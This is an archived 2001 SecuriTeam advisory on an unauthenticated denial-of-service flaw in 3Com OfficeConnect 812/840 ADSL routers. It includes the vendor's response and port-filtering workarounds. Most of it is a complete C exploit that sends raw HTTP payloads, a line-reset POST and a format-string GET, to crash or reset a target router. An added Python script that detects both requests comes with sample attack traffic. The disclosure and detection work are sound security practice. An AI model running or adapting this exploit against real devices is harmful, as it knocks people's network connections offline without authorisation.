[EXPL] 3Com OfficeConnect 812/840 Router DoS Exploit Code
From: support@securiteam.com
Date: 10/05/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] 3Com OfficeConnect 812/840 Router DoS Exploit Code
Message-Id: <20011005131242.9595D138C2@mail.der-keiler.de>
Date: Fri, 5 Oct 2001 15:12:42 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
3Com OfficeConnect 812/840 Router DoS Exploit Code
------------------------------------------------------------------------
SUMMARY
The web management interface of the 3Com OfficeConnect 812/840 ADSL Router,
reachable on TCP port 80 from the WAN side by default, accepts unauthenticated
requests that let a remote attacker reset the ADSL line or crash the router.
The proof of concept below sends one of two plain HTTP requests: a POST to
/Forms/adsl_reset (a "soft reset" that drops the line) or a GET whose path
is stuffed with repeated %s conversions (a "hard reset" that crashes the
device). 3Com's response points to the OCR812 software 1.1.9 patch and to
WAN port filtering and access lists as mitigations.
DETAILS
Workaround:
Filtering TCP port 80 on the WAN interface is enough to prevent this DoS,
since both payloads are ordinary HTTP requests to the router's management
web server. UDP port 53 (DNS) and TCP port 23 (telnet) are also open on the
WAN side by default and should be filtered as well unless remote management
from the WAN is actually required.
Vendor response:
"It appears that both individuals posting on these products have not taken
the opportunity to download the software patch for the OCR812 router
software version 1.1.9. In responding to the specific points above,
however, it is certainly possible to employ port filtering on the WAN
interface for ports 23 and 53 if the customer desires. Following the same
methodology as the port 80 filter available on the 3Com web site
(http://support.3com.com/infodeli/tools/remote/ocradsl/http_filtering.pdf).
More to the point however, our customers have requested that these routers
be managed remotely from the WAN by default. In most cases, they also
employ another method supported on these products called access lists.
Access lists will only allow IP addresses in the range configured to
access the management interfaces. For details on Access Lists see the
Command Line Interface manual available at:
http://support.3com.com/infodeli/tools/remote/ocradsl/20/812_cli20.pdf
Page 6-31 details how access lists are configured.
It is suggested that if access lists are used and used properly, the DoS
issues below do not exist."
Exploit:
// 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe others)
// Proof of concept, soft and hard reset, the security is weak
// Written by sniffer <sniffer@sniffer.net>
// Fri Sep 21 15:51:35 BRT 2001
// Viva Brazil!
//
// Usage: <binary> <1 (soft) || 2 (hard)> <remote router>
//   1 = soft reset: unauthenticated POST to /Forms/adsl_reset, which
//       resets the ADSL line
//   2 = hard reset: GET /graphics/sml3com followed by 65 "%s"
//       conversions, which crashes the router
//
// Both payloads are plain HTTP requests to TCP port 80 on the router.

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>

void
usage(char *binary)
{
    fprintf(stderr,
            "3Com OfficeConnect 812 ADSL Router Denial of Service (%s)\n"
            "sniffer <sniffer@sniffer.net>\n"
            "\t%s <1 (soft) || 2 (hard)> <remote router>\n",
            __FILE__, binary);
}

int
main(int argc, char **argv)
{
    int sockfd;
    int mode;
    char senddata[1024];

    /* "GET /graphics/sml3com" + 65 x "%s" + " HTTP/1.0\n\n" as raw bytes */
    char hardreset_data[] = {
        71,69,84,32,47,103,114,97,112,104,105,99,115,
        47,115,109,108,51,99,111,109,37,115,37,115,37,
        115,37,115,37,115,37,115,37,115,37,115,37,115,
        37,115,37,115,37,115,37,115,37,115,37,115,37,
        115,37,115,37,115,37,115,37,115,37,115,37,115,
        37,115,37,115,37,115,37,115,37,115,37,115,37,
        115,37,115,37,115,37,115,37,115,37,115,37,115,
        37,115,37,115,37,115,37,115,37,115,37,115,37,
        115,37,115,37,115,37,115,37,115,37,115,37,115,
        37,115,37,115,37,115,37,115,37,115,37,115,37,
        115,37,115,37,115,37,115,37,115,37,115,37,115,
        37,115,37,115,37,115,37,115,32,72,84,84,80,
        47,49,46,48,10,10,0 };

    /* "POST /Forms/adsl_reset HTTP/1.1\n"
       "Host: 192.168.1.254\n"
       "Connection: close\n"
       "Content-Length: 19\n\n"
       "Submit=Reset%20Line\n\n" as raw bytes (Host header is hard-coded) */
    char softreset_data[] = {
        80,79,83,84,32,47,70,111,114,109,115,47,97,
        100,115,108,95,114,101,115,101,116,32,72,84,84,
        80,47,49,46,49,10,72,111,115,116,58,32,49,
        57,50,46,49,54,56,46,49,46,50,53,52,10,
        67,111,110,110,101,99,116,105,111,110,58,32,99,
        108,111,115,101,10,67,111,110,116,101,110,116,45,
        76,101,110,103,116,104,58,32,49,57,10,10,83,
        117,98,109,105,116,61,82,101,115,101,116,37,50,
        48,76,105,110,101,10,10,0 };

    struct hostent *he;
    struct sockaddr_in their_addr;

    if (argc != 3) {
        usage(argv[0]);
        exit(0);
    }

    mode = atoi(argv[1]);
    if (mode != 1 && mode != 2) {
        usage(argv[0]);
        exit(0);
    }

    if ((he = gethostbyname(argv[2])) == NULL) {
        herror("gethostbyname");
        exit(1);
    }

    memset(&their_addr, 0, sizeof(their_addr));
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(80);    /* router's web management interface */
    memcpy(&their_addr.sin_addr, he->h_addr, sizeof(struct in_addr));

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    if (connect(sockfd, (struct sockaddr *)&their_addr,
                sizeof(their_addr)) == -1) {
        perror("connect");
        exit(1);
    }
    printf("connected\n");

    /* Copy the selected payload and send only the request itself,
       not the whole 1024-byte buffer. */
    memset(senddata, 0, sizeof(senddata));
    if (mode == 1)
        strncpy(senddata, softreset_data, sizeof(senddata) - 1);
    else
        strncpy(senddata, hardreset_data, sizeof(senddata) - 1);

    if (send(sockfd, senddata, strlen(senddata), 0) == -1) {
        perror("send");
        exit(1);
    }
    printf("evil data sent\n.. have a rice day\n");

    close(sockfd);
    return 0;
}
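The following script is added here as an example; it is not part of the original advisory or of the exploit author's code. It transcribes the two requests from the exploit's decimal byte arrays into readable HTTP and shows a check a defender can run over captured request lines to recognise either payload: a POST to /Forms/adsl_reset, or a request target containing a run of printf-style conversions. It goes slightly beyond the exact payload above, since it percent-decodes the target first and so also catches the same attack written as %25s. The sample requests, the threshold of four conversions, and the function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# The two requests the posted exploit sends, transcribed from its
# hardreset_data / softreset_data byte arrays.
HARD_RESET_REQUEST = "GET /graphics/sml3com" + "%s" * 65 + " HTTP/1.0\n\n"
SOFT_RESET_REQUEST = (
    "POST /Forms/adsl_reset HTTP/1.1\n"
    "Host: 192.168.1.254\n"
    "Connection: close\n"
    "Content-Length: 19\n"
    "\n"
    "Submit=Reset%20Line\n\n"
)

# One printf-style conversion: flags, width, precision, length modifier, type.
CONVERSION = r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l)?[diouxXeEfgGcspn]"
CONVERSION_RE = re.compile(CONVERSION)
RUN_RE = re.compile("(?:" + CONVERSION + ")+")   # back-to-back conversions


def parse_request_line(raw):
    """Split the first line of a raw HTTP request into (method, target, version)."""
    first = raw.split("\n", 1)[0].rstrip("\r")
    parts = first.split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % first)
    return parts[0], parts[1], parts[2]


def format_string_run(target):
    """Longest run of consecutive conversions in the percent-decoded target.

    Decoding first means ordinary URL-encoding such as %2d does not count,
    while an attacker who writes %25s to hide the payload is still caught,
    because the server-side decode turns it back into %s.
    """
    decoded = unquote(target)
    return max(
        (len(CONVERSION_RE.findall(m.group())) for m in RUN_RE.finditer(decoded)),
        default=0,
    )


def classify_request(raw, min_run=4):
    """Return "soft-reset", "hard-reset" or None for one raw HTTP request.

    min_run is an assumed threshold: a legitimate path may carry one stray
    %d, but a run of four or more conversions has no benign use.
    """
    method, target, _version = parse_request_line(raw)
    if method == "POST" and target.split("?", 1)[0] == "/Forms/adsl_reset":
        return "soft-reset"
    if format_string_run(target) >= min_run:
        return "hard-reset"
    return None


def scan(requests, min_run=4):
    """Classify a sequence of raw requests; returns [(index, verdict), ...] for hits."""
    hits = []
    for i, raw in enumerate(requests):
        verdict = classify_request(raw, min_run)
        if verdict is not None:
            hits.append((i, verdict))
    return hits


# Constructed sample traffic for the demonstration (not captured data).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0\n\n",
    "GET /cgi-bin/search?q=%2d%2d%2d%2d%2d HTTP/1.1\nHost: 192.168.1.254\n\n",
    SOFT_RESET_REQUEST,
    HARD_RESET_REQUEST,
    # Same attack with the conversions percent-encoded once
    "GET /graphics/sml3com%25s%25s%25s%25s%25s HTTP/1.0\n\n",
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_REQUESTS):
        method, target, _ = parse_request_line(SAMPLE_REQUESTS[index])
        print("request %d: %s %.40s -> %s" % (index, method, target, verdict))
```

Run as-is it reports the soft reset, the hard reset and the percent-encoded variant, and leaves the two benign requests alone. The soft-reset rule keys on the method and path only, because the exploit sends no credentials at all; the hard-reset rule is generic enough to flag the same technique against other paths on the same web server.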
ADDITIONAL INFORMATION
The information has been provided by Bruno Ratnieks <sniffer@sniffer.net>,
Raistlin <raistlin@gioco.net>, and Tom Kinahan <Tom_Kinahan@ne.3com.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.